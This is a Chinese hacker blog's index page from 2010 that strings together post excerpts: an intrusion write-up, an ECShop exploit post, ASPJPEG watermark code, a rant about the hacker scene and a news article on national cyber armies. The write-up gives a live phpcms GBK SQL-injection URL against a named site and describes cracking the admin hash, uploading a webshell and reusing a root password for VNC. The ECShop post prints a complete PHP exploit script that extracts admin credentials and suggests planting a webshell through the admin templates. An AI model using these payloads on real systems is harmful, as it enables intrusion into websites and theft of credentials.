渗透的主机是一朋友的，双线架设的虚拟主机，里面有几个站，架构是apache+php+mysql。在测试前，信息收集是很重要的。从系统信息、数据库信息、网络设备信息、管理员的信息等，都是值的统计分析和利用的。先对主机来端口扫描：

由图可知：这台服务器开放了80、443、5901等端口，开放了WEB、https、VNC等端口。由于是虚拟主机，确认其有多少个域名和网站，是旁注的第一步。使用虚拟主机站点查询工具，进行查询：

由上图可知，此IP上共有七个站点。随便浏览了这七个站点，其中有个站好像有问题。如下图：

很眼熟的phpcms标志。既然有主站在使用开源的CMS，值得”深入”。拿出wwwscan工具进行进一步扫描。

扫描结束后，告诉了几个目录，一一访问，寻找有没有敏感信息。

一个管理员界面，说明phpcms是2007版的。从分析结果来看，其一网站使用了phpcms2007版的程序，在Web应用程序渗透测试，注入是很常见的手法了。记得有个很经典的多字节编码漏洞。其漏洞引发的原理是：0xbf27不是有一个有效的GBK字符，但是经过addslashed()转换后就变成0xbf5c27,0xbf5c是个有效的GBK字符，所以0xbf5c27会当作一个字符0xbf5c和一个单绰号来处理，结果是跟在引号后查询语句得到了执行。在phpcms2007程序里由多字节编码漏洞引发的漏洞有多个，以area.php文件里的漏洞来作测试。
提交URL：

很经典的一个多字节编码漏洞的网页。继续提交来判断列数：

由上图可知，返回正常网页。继续提交URL：

返回不正常网页。
说明列数值是1，继续提交：
http://www.nuanyue.com/area.php?action=city&province=%BF%27/**/union/**/select/**/user()/**

看来网站连接数据库的权限很大。还可以通过version(),data()..等收集信息。直接暴露phpcmd后台的管理员和密码。利用后台可以上传编辑php文件获取WebShell。继续提交：

由上图可以知道，网站的管理员是phpcms，而密码是32MD加密的。可以直接去md5相关网站去查询如图：

已经知道管理后台帐号和密码了。直接进后台去上传脚本木马了。由于phpcms程序在后台上传php脚本没有限制，所以得到后台，就可以上传脚本木马。

其次渗透测试利用的方法主要是旁注，旁注的意义在于”曲径通幽”，进而获取系统权限。在此之前，收集数据库信息、系统信息、网站信息和系统管理员的信息进行综合分析利用，在社工是有意义的。在获取一网站的权限，我们进行分析。

获取系统的mysql的管理员帐号是root,密码是12*。许多管理员有密码系统多用的情况，来试试vnc是不是也用这个密码？

直接进去了，获取root权限，连用exp来提权都省了。”三分技术，七分管理”，很好的验证，一个密码多用或者密码有规律的都是存在风险的。

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《一次简单的“旁注”渗透》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

在T00LS原来的号被社了  (2010-1-24 15:47:23)

cmd5.com整站程序下载 如假包换md5  (2010-1-24 12:4:40)

美印恶炒中国有30万网络大军 破坏力极大  (2010-1-24 11:56:47)

telnet到163邮箱发信  (2010-1-23 23:5:55)

CMD下建立VPN  (2010-1-23 21:9:2)

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《MySQL数据库备份的基础知识大全》的全文内容...

分类: 数据库-数据挖掘 | Tags: mysql  数据库   | 添加评论(0)

相关文章:

Oracle exp/imp导出导入工具的使用  (2009-12-18 5:26:13)

如何在oracle中导入dmp数据库文件  (2009-12-18 5:22:33)

Sql server2005 优化查询速度50个方法小结  (2009-12-9 23:28:35)

在Oracle中导出、导入dmp数据库文件  (2009-9-2 1:47:29)

MYSQL常用命令列表  (2009-8-19 11:34:45)

 这个是我申请不久的号，被人射了，呵呵~没事，哥每个密码都不一样的！

不过我有点猜到是某人了~

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《在T00LS原来的号被社了》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

一次简单的“旁注”渗透  (2010-1-24 16:40:58)

cmd5.com整站程序下载 如假包换md5  (2010-1-24 12:4:40)

美印恶炒中国有30万网络大军 破坏力极大  (2010-1-24 11:56:47)

telnet到163邮箱发信  (2010-1-23 23:5:55)

CMD下建立VPN  (2010-1-23 21:9:2)

今天在月光的博客上看到一个关于ASPJPEG这个组件的使用方法。

upload/201001241429554141.gif下载吧
四、图片切割
一直以来，对aspjpeg不了解的人以为是无法用它来进行切割的。
其实有这样的一个方法的
crop x1,y1,x2,y2
切割长方型左上角x坐标，y坐标 右下角x坐标 y坐标
下面我就做一个演示哈
Set Jpeg = Server.CreateObject("Persits.Jpeg")
jpeg.open server.MapPath("/pic/1.gif")
jpeg.width=70
Jpeg.Height = Jpeg.OriginalHeight*70 / jpeg.Originawidth
jpeg.crop 0,0,70,52 开始切割其实是把超过52象素的下部分去掉
jpeg.save server.MapPath("/temp_pic/small_1.gif") 保存
怎么样，很简单吧
五、图片合并
我们这里是要把logo图片加到dodge_viper.jpg图片上去
其实，图片合并的方法也可以用来动态打水印哦
Set Photo = Server.CreateObject("Persits.Jpeg")
PhotoPath = Server.MapPath("images") & "dodge_viper.jpg"
Photo.Open PhotoPath
Set Logo = Server.CreateObject("Persits.Jpeg")
LogoPath = Server.MapPath("images") & "clock.jpg"
Logo.Open LogoPath

Logo.Width = 70
Logo.Height = Logo.Width * Logo.OriginalHeight / Logo.OriginalWidth

Photo.DrawImage 0, 0, Logo

Photo.SendBinary 这里用了sendBinary的输出方法。当然，你也可以先保存更改后的dodge_viper.jpg，再输入也可以。我个人不大喜欢用sendBinary方法，在网速慢的时候容易出错。在速度方面也不怎样。呵呵。
六、数据库支持
这里不多说了。其实就是Binary方法，大家知道图片存进数据库只能存为二进制的文件的。所以代码就懒的写了。
七、更多方法介绍
Canvas.Line(Left, Top, Right, Bottom)
画一条直线
Canvas.Ellipse(Left, Top, Right, Bottom)
画出一个椭圆
Canvas.Circle(X, Y, Radius)
画出一个圆
Canvas.Bar(Left, Top, Right, Bottom)
画出一个长方形，上面有代码介绍了
Canvas.Font.ShadowColor
文字阴影颜色
Canvas.Font.ShadowXOffset As Long
阴影X坐标设定
Canvas.Font.ShadowYOffset As Long
Y坐标设定
Canvas.Font.BkMode As String
文字背景

使用实例: 添加有透明度的水印文字

  Set Jpeg = Server.CreateObject("Persits.Jpeg")  ' 建立对象
  Jpeg.Open Server.Mappath(sUploadDir & sSaveFileName) ' 图片所在位置
  Dim TempA '原始图片的二进制数据
  Dim TempB '加了不透明文字水印的图片
  Dim TempC '最终效果
  TempA=Jpeg.Binary'将原始数据赋给TempA
  Jpeg.Canvas.Font.Color = &hffffff ' 颜色,这里是设置成:黑
  Jpeg.Canvas.Font.Family = "宋体"  ' 设置字体
  Jpeg.Canvas.Font.Bold = True '是否设置成粗体
  Jpeg.Canvas.Font.Size = 28 '字体大小
  Jpeg.Canvas.Font.Quality = 5 ' 文字清晰度
  Jpeg.Canvas.Print Jpeg.OriginalWidth/2-170,Jpeg.OriginalHeight/2-30, "<a href="http://www.nhs8.com/upload/201001241429564520.Jpeg")
  MyJpeg.OpenBinary TempA
  Set Logo = Server.CreateObject("Persits.Jpeg")
  Logo.OpenBinary TempB
  MyJpeg.DrawImage 0,0, Logo, 0.4'0.3是透明度
  TempC=MyJpeg.Binary'将最终结果赋值给TempC,这时也可以生成目标图片了
  MyJpeg.Save Server.Mappath(sUploadDir & sSaveFileName)  ' 保存文件
  set TempA=nothing
  set TempB=nothing
  set TempC=nothing
  Jpeg.close
  MyJpeg.Close
  Logo.Close

1 白色&HFFFFFF 2 红色&HFF0000 3 绿色&H00FF00 4 蓝色&H0000FF 5 牡丹红&HFF00FF 6 青色&H00FFFF 7 黄色&HFFFF00 8 黑色&H000000

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《使用ASPJPEG添加水印的方法》的全文内容...

分类: 神刀网站建设 | Tags: 网站   | 添加评论(0)

相关文章:

白开水的自白  (2010-1-24 12:35:22)

一个技巧的SEO优化方案  (2010-1-20 3:22:21)

zblog代码修改介绍  (2010-1-20 3:0:59)

zblog修改简单教程  (2010-1-20 2:58:40)

z-blog-自动加入版权信息代码  (2010-1-20 2:55:52)

不,方向是有的,只是努力错了吧.看到安全栏目那块,和其他板块相比,很明显我就是个网络安全的,有句话说得好,只有了解安全,才会懂得防御,但是任何计算机的防御都逃不过oday,比如上次的dz7.17.2洞,有大概10w个站遭到入侵.如果7.0也有的话,那么抗生也不要做了,直接挂.和之前dede洞有得比,群里当时还有人在卖dzday,开价3000,我也不多说了,转行挖洞好了.

国内的hack市场很奇妙,收徒弟,拜师,刷钻,日站,抓鸡,中国的计算机早成了挂鸡大国和傀儡国了,国外就纯技术,一堆的原创分析资料丢来丢去,学术环境很高,最近的土耳其黑客不是很鄙视中国吗?黑了直接挂首页,很屌不?当我们还停留在抓鸡和刷钻种马,人家的级别已经去到了乱日级别了.所以说要有大师的思想,学习是一种态度,包括做人,土耳其那家伙是人品低了点,呵呵..
很多大牛都是自己有一套工具,自己挖一手oday,估计微软很多洞子都还没公开,仅在少数人的手上.

本神刀网不仅关注网络安全,还会有其他,溜客网的站长说,我们不与博客类型链接,其实学习岂在分类论坛门户与博客,只要有学习的气氛够了,都一个样.不过也难怪,中国做站很难,特别是黑客站,一不小心,一堆人来路站了,还办班收学生vip500一个终身,是网站的终身吧,黑鹰就是一个例子了,呵呵..苦笑呀.

学习带急功近利的心态肯定学不好到精通,只会到了照猫画虎程度就沾沾自嘻了,不学则已,要学就学精,这句话送给大家.谦虚,就算买了vip也要对待得起你们妈咪,哥路过的..

...中国这个黑客怎么那么奇怪呢?...

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《白开水的自白》的全文内容...

分类: 技术研究作坊 | Tags: 网站   | 添加评论(0)

相关文章:

使用ASPJPEG添加水印的方法  (2010-1-24 13:22:49)

一个技巧的SEO优化方案  (2010-1-20 3:22:21)

zblog代码修改介绍  (2010-1-20 3:0:59)

zblog修改简单教程  (2010-1-20 2:58:40)

z-blog-自动加入版权信息代码  (2010-1-20 2:55:52)

环境自己搭，DLL自己反。

收点钱 ，来的不容易 。

觉得不值得大牛可以不下， 嘴下留情了， 谢谢。

下载地址：201001241206064205.rar

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《cmd5.com整站程序下载 如假包换md5》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

一次简单的“旁注”渗透  (2010-1-24 16:40:58)

在T00LS原来的号被社了  (2010-1-24 15:47:23)

美印恶炒中国有30万网络大军 破坏力极大  (2010-1-24 11:56:47)

telnet到163邮箱发信  (2010-1-23 23:5:55)

CMD下建立VPN  (2010-1-23 21:9:2)

美国《时代》杂志曾推出关于“网络战”的封面文章

　　2010年1月12日，美国谷歌公司以遭到中国黑客攻击为由威胁退出中国。1月14日，印度媒体也抛出了“印度总理办公室受到中国黑客攻击”的报道，甚至声称中国组建了一支30万人的网络大军，用以侵入其他国家的网络。

　　对于这些指责，中国政府均已予以否认。但美国国防部长盖茨20日访问印度时，美印官员仍声称中国可能成为两国的“网络敌人”，美国更准备扶持印度制衡“网敌”中国。

　　中国国家互联网应急中心有关官员22日指出，中国已成为网络攻击最大的受害国。事实上，对于高度依赖信息化、网络化技术的西方国家而言，大多建有十分专业的“黑客部队”，其中尤以美国为最，印度也不例外。美印闭口不提自己的黑客部队，却不断恶炒所谓中国黑客，显然是在为自己组建“网军”、将网络用于政治目的寻找借口。

　　“中国黑客侵入印总理办公室”

　　印媒妄称中国有30万网军

　　1月14日，《今日印度》报纸网站在其“今日头条”栏目刊发了一篇题为“中国黑客的目标是(印度)总理办公室”的文章，文章声称，中国黑客于2009年12月左右，开始攻击印度总理办公室30多名要人的电脑。报道称，目前印度安全机构组成的调查组正在评估黑客身份，并将确定是否是中国政府指派的间谍所为。

　　报道还大肆渲染中国组建的所谓“网络部队”。印度网络法规和IT业行动委员会主席帕万杜加尔甚至说，中国已经组建了一支大约30万人的网络部队，唯一的工作就是侵入他国的安全网络。因此，每个国家都必须建立网络部队以遏制中国。曾从事间谍活动的印度研究与分析局前官员辛格称，中国的网军不仅包括穿制服的军人，也包括其他人，可能也有学生在内。

　　“破坏力不逊大规模杀伤性武器”

　　美FBI鼓吹中国网络威胁论

　　美国在线媒体“每日野兽”近日报道说，据美国联邦调查局(FBI)的一份机密报告认为，中国已经组建了一支超过18万人的网络军队，目标是在2020年建立世界第一支“信息化武装的部队”。

　　这份报告评估称，中国军队中现有3万多名网络特工，还有15万民间电脑高手。他们的任务是窃取美国的军事和科技情报，同时具有摧毁美国关键基础设施、入侵银行和商业网络、危及敏感军事和国防资料库的潜在能力。

　　FBI评估认为，中国在网络战场上的技术突破能力已经领先于其他国家。源自中国的网络攻击足以对美国的经济、电信、电网和军事准备造成实质性的破坏，一次大规模的网络攻击可能达到“大规模杀伤性武器的破坏级别”。

　　中国是网络攻击最大受害国

　　事实上，中国的信息网络也面临着境外黑客攻击的严重威胁。而美国则是发动网络攻击最频繁的国家。

　　中国是黑客攻击最大受害国

　　国家互联网应急中心(CNCERT)运行部副主任周勇林22日接受采访时指出，我国已成为网络攻击最大的受害国。周勇林介绍说，目前网上有成百上千万的计算机感染了木马或僵尸程序，并被各种各样的黑客暗中控制，成为所谓的“肉机”。2009年我国境内被木马程序控制的主机IP数量为26.2万个，境外有近16.5万个主机地址参与控制这些计算机，其中来自美国的占16.61%，排名第一；2009年我国境内被僵尸程序控制的主机IP数量为83.7万个，境外有1.9万个主机地址参与控制这些计算机，其中来自美国的占22.34%，排名第一。

　　美国Symantec公司(注：全球最大的网络安全公司)2008年互联网安全威胁报告中指出，网络攻击源的数量美国居世界第一位，占世界总量的25%；位于美国的僵尸控制服务器数量居世界首位，占世界总量的33%，远远超出世界上任何一个其他国家。

　　美情报机构攻击中国是常事

　　美国政府经常将网络用于政治目的。包括拦截信息，搜集情报；输出美国价值观；支持“颜色革命”；扶持所谓“敌对”国家和“看不顺眼”国家的反对派；战时先发制人，干扰对方通讯和指挥系统等。

　　据美国“每日野兽”网站在相关报道中指出，尽管没有一名美国官员承认，但美国国防部、中央情报局以及美国国家安全局都在常规性地攻击中国军事和工业领域的计算机网络，以获取多年前只能由职业间谍才能得到的情报。而一旦与中国发生冲突，美国及其欧洲盟友会尝试破坏中国电脑网络、制造一些麻烦。

　　美斥巨资煽动蛊惑中国网民

　　据香港某传媒报道，美国情报机构每年出资数千万美元对中国网民进行思想渗透、策反。他们出没于各大中文论坛、门户网站。“哲瓦在线”就是由美国官方机构和海外“藏独”组织合作进行的秘密项目。

　　据报道，“哲瓦在线”的任务是，利用互联网对中国网民进行煽动、蛊惑、渗透、策反，制造谣言引发动乱并搜集中国情报。一名曾在“哲瓦在线”工作的藏族青年醒悟后揭露说，这个组织就是一个听命于美国的网络间谍机构，拿美国人的钱，受美国人监督，并为美国人服务。

　　香港大公报发表的《防美日网间舆论扰华》一文之中也称，经常在网上发表敏感文章的人背景不简单，他们受雇于美日间谍机构。

　　综合新华社、《环球视野》

　　网络战争 也许就在今天

　　在好莱坞电影《虎胆龙威4》里，恐怖分子利用电脑黑客编写的程序，控制了交通网络、股市、电视广播和电力网络，股市交易瘫痪、中断电力供应、制造白宫被炸的假象，甚至“遥控”战斗机机师攻击片中男主角布鲁斯威利。

　　这部电影触动了人们的隐忧。过去十年，美国人最担心控制一切的国家网络被骑劫，飞机因失去控制突然从天而降，大坝水闸突然开启淹没万亩良田和城市，发电站发生爆炸，电力网络被阻断。值得庆幸的是，这些事情都不曾发生。

　　“网络威慑”是新的“核威慑”

　　不过，各国政府早已为这些潜在风险作准备。从美国到欧洲，再到东亚，世界各国开始加强网络战的攻防实力。或者更准确地说，各国基于核威慑概念，开始构建各自的“网络威慑”。

　　美国战略与国际研究中心曾指出，建立强大的网络攻击实力，是阻吓对手发动攻击的有效方法之一。然而，这种大规模的网络战就像核武器一样，不能轻易使用。因为很可能招致对方的传统军事打击，或者殃及自己和盟国。但是在一定范围内，网络战争已经悄悄打响。

　　首场网络战演兵爱沙尼亚

　　2007年4月26日晚上10时左右，在没有任何预兆的情况下，爱沙尼亚政府网站突然被电子信息淹没。尽管有防火墙、额外服务器和人员应付这类突发性事件，但防线还是遭攻破，攻击次数呈指数式增长。国会电邮服务器是最先遭殃的网络设施之一。被攻击的目标迅速增加到好几百个，包括政府、银行、新闻媒体和大学的网站。5月18日出现最后一波攻击后，这一场网络战才逐渐平息下来。

　　这场大规模网络袭击的起因，是爱沙尼亚政府把地处首都塔林的苏军解放塔林纪念碑搬迁。爱沙尼亚方面声称，这场攻击已超出一般黑客的能力，指控俄罗斯政府参与其事，但俄罗斯政府对此予以否认，只是说一些俄罗斯个人和组织参与了这次袭击。

　　事实上，美国也在2007年开始在伊拉克的反恐战争中动用网络手段对付叛乱分子，而且取得不错的成效。叛乱分子的通信系统遭美军控制，许多叛乱分子被蒙蔽及诱骗，纷纷被捕或遭击毙。

　　2008年，俄罗斯在南奥塞梯战事中挥军格鲁吉亚时，格鲁吉亚的网络也遭到攻击。不过，俄罗斯否认曾发动网络攻击。

　　2009年美国独立日当天，美国和韩国先后发生了疑为朝鲜发动的网络战。本报综合报道 李珊

　　各国“网军”大揭秘

　　●美国 目前拥有最大的网络战力量，三军都有网络部队。早在2002年，美军就组建了世界上第一支网络黑客部队———网络战联合功能构成司令部(简称JFCCNW)。这支部队由世界顶级电脑专家和“黑客”组成，其人员组成包括美国中央情报局、国家安全局、联邦调查局以及其他部门的专家，所有成员的智商都在140分以上，因此被戏称为“140部队”。

　　●英国英国军情六处早在2001年就秘密组建了一支由数百名计算机精英组成的黑客部队。有报道称该部队吸收了大量有前科的民间黑客。从机构设置看，英军主要将网络战应用于情报领域。

　　●日本日本防卫省已经组建了一支约5000人的网络战部队，主要任务是进行反黑客攻击，同时研制开发可破坏其他国家网络系统的跨国性“网络武器”，必要时可对敌方重要网络实施“瘫痪战”。

　　●印度印军在陆军总部建立了网络安全部门，并在所有军区和重要军事部门建立网络安全分部。据悉，印度还对军校学员进行“黑客技术”培训，课程集中在“获取情报和反网络刺探”上，并宣称“谁从事黑客活动谁就会赢得战争”。

　　●朝鲜据美国和韩国媒体称，朝鲜网络战部队目前拥有100多名成员。该部队任务是入侵敌方军事机构电脑网络，盗窃资料，在必要情况下散布电脑病毒，瘫痪其网络。随着朝鲜黑客部队能力增强，其目标已转向发动网络战争。

　　●伊朗 伊朗官方称，“伊朗网军”是民间组织，也经常“黑”伊朗政府的网站。而美国媒体称，“伊朗网军”是个人或者组织的联合，是伊朗政府进行网络战的工具。

　　除此之外，俄罗斯、以色列等国也都十分重视“黑客部队”，大量军民领域网络精英正在成为未来网络战的后备军。

　　中国网络战研究专家张召忠——

　　中国不会无端‘网攻’他国

　　国防大学教授、著名军事专家张召忠少将，曾多年从事网络战研究，以下是他对网络战的相关解读。

　　网络战作为一种战争形态和具体的作战样式，无时无刻不在世界的网络当中进行作战。这个作战分成几个领域。一个是相对独立的军队的网络，军队的网络是和网络攻击、黑客攻击、电子战、信息战在一块的。还有一个网络是公开的因特网，作战空间是跨越国界、跨越时空的，如果出现问题，对每一个人和国家要害部门的安全存在很大危险，比如说民航部门、银行系统、保险系统和股市等。所以说大家都依赖网络的时候，网络的危险性也在增加。

　　现在的网络战，我管它叫战略的网络战，它是跨越时空跨越国界的，你很难找到它是从哪个地方对你发动的攻击，也很难找到发动攻击的这个人是谁，有可能是军人，也可能是老百姓，可能是成人，也可能是个孩子。还有，网络产品大部分都是美国日本等西方国家研制的，其他国家都对他越来越依赖，他有权力、有技术手段去检查你的东西。

　　不管是一个国家，还是一个个人，如果在和平时期无端地去攻击另外一个国家的政府网站或者攻击任何一个个人的网站，这都是违法的行为，这和恐怖袭击没什么两样，我们中国不会做这个事情。但是西方为了从政府获得一笔资金，为了能够建立自己的网络部队，为了能够树立自己的一个敌人，经常散布中国网络威胁论，这是值得警惕的。据中国广播网

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《美印恶炒中国有30万网络大军 破坏力极大》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

一次简单的“旁注”渗透  (2010-1-24 16:40:58)

在T00LS原来的号被社了  (2010-1-24 15:47:23)

cmd5.com整站程序下载 如假包换md5  (2010-1-24 12:4:40)

telnet到163邮箱发信  (2010-1-23 23:5:55)

CMD下建立VPN  (2010-1-23 21:9:2)

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《telnet到163邮箱发信》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

一次简单的“旁注”渗透  (2010-1-24 16:40:58)

在T00LS原来的号被社了  (2010-1-24 15:47:23)

cmd5.com整站程序下载 如假包换md5  (2010-1-24 12:4:40)

美印恶炒中国有30万网络大军 破坏力极大  (2010-1-24 11:56:47)

CMD下建立VPN  (2010-1-23 21:9:2)

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《CMD下建立VPN》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

一次简单的“旁注”渗透  (2010-1-24 16:40:58)

在T00LS原来的号被社了  (2010-1-24 15:47:23)

cmd5.com整站程序下载 如假包换md5  (2010-1-24 12:4:40)

美印恶炒中国有30万网络大军 破坏力极大  (2010-1-24 11:56:47)

telnet到163邮箱发信  (2010-1-23 23:5:55)

天气又冷了~~多穿点！

 ECShop Exp 下载：201001232034122405.rar

1.针对2.6最近的oday，先注出了账号密码，拿去md5算出！

2./admin 登录进后台 库模板直接插一句话或者整个webshell直接上！

ps：遇到了个linux的，权限限死，不给运行，直接插到页面里直接运行！

以下转个文章更具体点！

尝试了一个网站注入进了后台之后，在网上查了一下ECSHOP后台拿shell的方法，发现网上传阅的基本上都是oldjun大牛的那篇《ECSHOP后台拿shell的方法》文章。说实话这篇文章当做教材学技术用还可以，但实际用起来几乎是不可能的，因为那个方法的前提是register_globals为on的环境，可是现在这样的环境几乎为零，所以必须另需他法。

       在oldjun大牛的博客看这篇文章的时候，注意了一下底下的评论，就发现了好东西。如图：     

 
by Ryat
http://bbs.wolvez.org
2009-03-24
影响2.5.x和2.6.x,其他版本未测试
goods_script.php44行:
    if (empty($_GET['type']))
    {
        ...
    }
    elseif ($_GET['type'] == 'collection')
    {
        ...
    }
    $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
    $res = $db->query($sql);
 
$sql没有初始化,很明显的一个漏洞:)
EXP:
 
#!/usr/bin/php<?phpprint_r('+---------------------------------------------------------------------------+ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploitby puret_tmail: puretot at gmail dot comteam: http://bbs.wolvez.orgdork: "Powered by ECShop"+---------------------------------------------------------------------------+');/** * works with register_globals = On */if ($argc < 3) {    print_r('+---------------------------------------------------------------------------+Usage: php '.$argv[0].' host pathhost:      target server (ip/hostname)path:      path to ecshopExample:php '.$argv[0].' localhost /ecshop/+---------------------------------------------------------------------------+');    exit;}error_reporting(7);ini_set('max_execution_time', 0);$host = $argv[1];$path = $argv[2];$resp = send();preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);if ($hash)    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");else    exit("Exploit Failed!\n");function send(){    global $host, $path;    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';    $data = "POST ".$path."goods_script.php?type=".time()."  HTTP/1.1\r\n";    $data .= "Accept: */*\r\n";    $data .= "Accept-Language: zh-cn\r\n";    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";    $data .= "Host: $host\r\n";    $data .= "Content-Length: ".strlen($cmd)."\r\n";    $data .= "Connection: Close\r\n\r\n";    $data .= $cmd;    $fp = fsockopen($host, 80);    fputs($fp, $data);    $resp = '';    while ($fp && !feof($fp))        $resp .= fread($fp, 1024);    return $resp;}?>

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《ECSHOP 2.6 后台拿shell超简单版》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

一次简单的“旁注”渗透  (2010-1-24 16:40:58)

在T00LS原来的号被社了  (2010-1-24 15:47:23)

cmd5.com整站程序下载 如假包换md5  (2010-1-24 12:4:40)

美印恶炒中国有30万网络大军 破坏力极大  (2010-1-24 11:56:47)

telnet到163邮箱发信  (2010-1-23 23:5:55)